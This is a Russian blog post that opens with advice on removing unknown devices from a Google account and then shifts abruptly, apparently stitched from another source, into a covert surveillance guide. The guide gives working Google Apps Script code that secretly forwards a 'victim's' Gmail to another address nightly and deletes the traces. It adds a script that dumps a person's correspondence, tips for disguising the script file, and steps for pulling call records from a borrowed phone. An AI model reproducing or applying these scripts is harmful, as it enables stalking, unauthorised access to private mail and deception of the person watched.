Хакеры придумали новый способ взлома аккаунтов Google

BOMBERuss

 В этой статье я расскажу как отвязать лишнее устройство от аккаунта в Google.  Одна история: Некая девушка с ноутбука решила совершить покупку на AliExpress через браузер Google Chrome, но войдя на сайт поле ввода логина и пароля уже было заполнено чужими учетными данными.   Опешив девочка полезла в настройки хрома и в Smart Look данные от этого аккаунта на Али, а так же от аккаунтов на сайтах, которые она никогда не посещала! Как мы знаем Smart Look сохраняет пароли в Гугл и позволяет синхронизировать их на разных устройствах, но девушка клялась и божилась что аккаунт ее и синхронизация только с браузером в ноуте и ее смартфоном. Так же удаление гугловского хрома и очистка паролей не помогла — после свежей установки учетные данные появлялись снова.   После моей подсказки по проверке наличия других устройств в аккаунте Google проблема решилась и выяснилось что девочка продала свой старый смартфон не произведя Hard Reset, да и покупатель не вернул его к заводским настройкам.

Данный метод удаления устройств применим во многих случаях:

1. Вы продали устройство на Android не удалив логин и пароль от аккаунта Google;
2. Вы имеете давно утерянные или не работающие гаджеты в списке;
3. Вы временно вводили свой логин и пароль от аккаунта на чужих устройствах;
4. Вы потеряли гаджет и Вам на него плевать…

 Как удалить гаджет из аккаунта Google

1. Входим в Google по своей электронной почте и паролю;
2. Переходим на страницу настроек https://myaccount.google.com/preferences;
3. Слева нажимаем ссылку «Безопасность»;
4. Листаем ниже до пункта «Ваши устройства»;
5. Под списком нажимаем «Управление устройствами»;
6. Выбираем не нужное или не ваше устройство;
7. Нажимаем красную кнопку «ЗАКРЫТЬ ДОСТУП«.

UPD: Удаление гаджета через поиск телефона

При невозможности отвязки устройства методом описанным выше можно удалить гаджет через поиск телефона.

• Переходим https://myaccount.google.com/find-your-phone
• Выбираем нужный гаджет;

• Авторизуемся при помощи пароля;
• Выбираем раздел «Выйдите из аккаунта на телефоне»;
• Нажимаем синюю кнопку «ВЫЙТИ ИЗ АККАУНТА»;
• Ждем выхода.

Полезная статья? Поделись ссылкой в соц.сети с друзьями: Дата последнего изменения текста:

Сохраняем переписку VK и прочие страницы с личной информацией

Для переписки VK совет будет предельно простой: прокручиваем страницу с диалогами максимально вниз и выбираем пункт меню Файл -> Сохранить/либо Экспортировать как PDF. После копируем сохраненный файл к себе на флешку и по завершению операции в спокойной обстановке изучаем собеседников человека и их страницы. Аналогично можно поступить со всеми сайтами, на которых есть возможность обмениваться личными сообщениями.

Если очень надо и у вас есть хотя бы полчаса доступа, то можно намутить сохранитель сообщений на iMacros, который сохранит переписку полностью. Но готовый код в статье дать сложно, так как там необходимо использовать указатели элементов по координатам X,Y, которые у каждого пользователя будут свои. А для описания общего подхода к написанию таких макросов нужна отдельная статья. Что-то можно почерпнуть из Хочешь я посижу в интернете за тебя?. Плюс этот способ уже выходит за рамки 5-минутного вторжения.

Смотрим историю поиска

Открываем history.google.com, нажимаем на иконку «три вертикальные точки» и в открывшемся меню выбираем пункт Download searches, соглашаемся с условиями и закрываем уведомление о том, что архив с историей поиска придет к нам на почтовый ящик. Открываем Gmail и дожидаемся письма с искомым файлом (придет через пару минут). Не забываем удалить это письмо.

Поисковые запросы в архиве распределены по месяцам в файлы формата json. Его можно конвертировать в файл Microsoft Excel на сайте json-xls.com.

Читаем чужую почту каждый день

Часто ли вы смотрите папку «Удаленные»? Большинство людей, которые не слишком активно пользуются почтой, заглядывают в нее раз в квартал и можно спокойно пересылать их письма себе.

Если в Gmail настроить автоматическую пересылку почты традиционным способом на некий адрес, то неделю при заходе в почту будет отображаться всплывающее уведомление об этом сверху экрана. Это делается в целях защиты пользователя от любителей следить за чужой перепиской.

Но если сделать это с помощью Google Apps Script, то никто ничего не заметит (если, конечно, жертва регулярно не просматривает список триггеров GAS).

Идем на docs.google.com и создаем новый файл. Открываем Инструметы->Редактор скриптов и копируем в него следующий код: [jscript] function forwardEmails() { var searchText = «newer_than:1d»; var threads = GmailApp.search(searchText); // Ищем письма, отправленные в последние сутки for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем var messages = threads[x].getMessages(); // Разбираем цепочку по письмам for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо messages[i].forward(«[email protected]»);// Пересылаем письмо на нужный адрес } } } [/jscript]

Этот код пересылает на определенный адрес все письма, которые отправлены в последние сутки (естественно, при вставке кода надо не забыть этот адрес указать). При желании можно добавить другие фильтры поиска писем (они описаны в третьем разделе этой статьи). Теперь надо вставить код, который будет удалять пересланные письма из папки «Отправленные»:

[jscript] function deletedEmails() { var searchText = «to:[email protected]»; var threads = GmailApp.search(searchText); // Ищем письма, отправленные на адрес для слежки for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем var messages = threads[x].getMessages(); // Разбираем цепочку по письмам for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо messages[i]..moveToTrash(); // Перемещаем письмо в папку удаленные } } } [/jscript]

А теперь нам нужно сделать так, чтобы эти две функции запускались каждую ночь. В редакторе скриптов идем в Ресурсы -> Триггеры текущего проекта

Сохраняем изменения. Все! Теперь каждое утро вы можете читать письма жертвы!

К сожалению, если человек активно пользуется Google Docs, то он может обнаружить пустой файл со скриптами. Но если вставить в нее инфу о горячих клавишах для сервисов Google и назвать Autogenerated Help Document, то есть шанс, что в суете дел человек не увидит в нем опасности. Можно еще подписать где-нибудь предупреждение, чтобы человек не удалял этот файл, если хочет получать новую полезную информацию.

Если вышеприведенный абзац кажется вам смешным, вспомните строчку: «И обмануть меня нетрудно, я сам обманываться рад». Человек скорее поверит, что Google сам создает ему файлы помощи, чем предположит, что кто-то лазил в его Google Drive в его отсутствие, так как подсознание охраняет человека от столь травмирующих фактов.

Сохраняем себе чужие письма

Это трюк проходит только с почтовым ящиками на Gmail. Идем на docs.google.com и создаем новый файл. Открываем Инструметы->Редактор скриптов и копируем в него следующий код: [jscript] function collectEmails() { var doc = DocumentApp.create(‘Переписка’); // Новый файл появится в корневой папке Google диска var searchText = «[email protected]»; // Адрес, переписку с которым надо сохранить var finalText = «»; // Переменная в которую будем собирать тексты писем var body = doc.getBody(); var threads = GmailApp.search(searchText); //Ищем все письма, содержащие искомый адрес for (var x=0; x<=threads.length-1; x++) { // Просматриваем каждую найденую цепочку писем var messages = threads[x].getMessages(); // Разбираем цепочку по письмам for (i=0;i<=messages.length-1;i++) { // Просматриваем каждое письмо finalText=finalText + messages[i].getSubject() + messages[i].getPlainBody() + «»;// Считываем из него текст и тему } body.appendParagraph(finalText); // Записываем тексты и темы всех писем в файл } } [/jscript]

Нажимаем кнопку запуска и соглашаемся на предложение о сохранение проекта. Еще раз нажимаем на кнопку запуска и даем скрипту разрешение на доступ к почте. Никаких паролей никто не спрашивает. Готовый файл можно скачать себе на флешку для последующего ознакомления (Файл -> Скачать как). Не забываем об удалении всех созданных файлов.

Метод search() можно использовать не только для поиска переписки с конкретным человеком. Вот другие примеры поисковых запросов, которые можно указать в скобках:

• from:Иван Иванов — письма от адресата с определенным именем;
• subject:Расчет — письма с определенной темой;
• has:attachment — письма, у которых есть прикрепленные файлы;
• is:unread — непрочитанные письма;
• is:spamed — письма из папки «Спам»;
• after: 2016/04/01 — письма, отправленные после 1 апреля 2016 года;
• before: 2016/04/01 — письма, отправленные до 1 апреля 2016 года;
• circle:Семья — поиск писем от участников круга «Семья»;
• size:2 000 000 — письма больше 2 мегабайт.

Если вы хотите использовать несколько параметров, то указывайте их через пробел.

Можно было просто скачать почтовый ящик в формате mbox, но для этого необходимы ввод пароля и длительное ожидание.

Получаем детализацию звонков

Чтобы получить детальную информацию о звонках абонентах не нужно иметь связей в органах или тайно снимать скан паспорта, готовясь атаковать менеджера салона сотовой связи приемами социнженерии. Достаточно получить аппарат с нужной симкой на пять минут в личное пользование.

У МТС (и Билайн вроде тоже), если раздать WiFi с телефона, то с компьютера вход в личный кабинет осуществляется без пароля. В личном кабинете можно заказать PDF (или XLS) файл с детализацией звонков за полгода (или более короткий срок) и послать на любой адрес электронной почты. И этот процесс занимает меньше минуты! Естественно, тоже самое можно провернуть, если зайти в личный кабинет непосредственно со смартфона.

Другие операторы я не проверяла, но скорее всего у них аналогичная ситуация. Так что не стоит просматривать историю звонков на телефоне, лучше сразу послать детализацию себе на почту. Очень удобно, что в файле видно из каких регионов идут звонки. Можно отследить местоположение абонента в разные периоды:

Свести номера из детализации с реальными людьми поможет восьмой раздел из статьи Что интересного можно собрать, получив доступ к чужому компьютеру Mac на минуту, либо информация в пункте 4 текущего текста.

Используемые источники:

• https://www.bomberuss.ru/2018/03/google.html
• https://www.iphones.ru/inotes/565455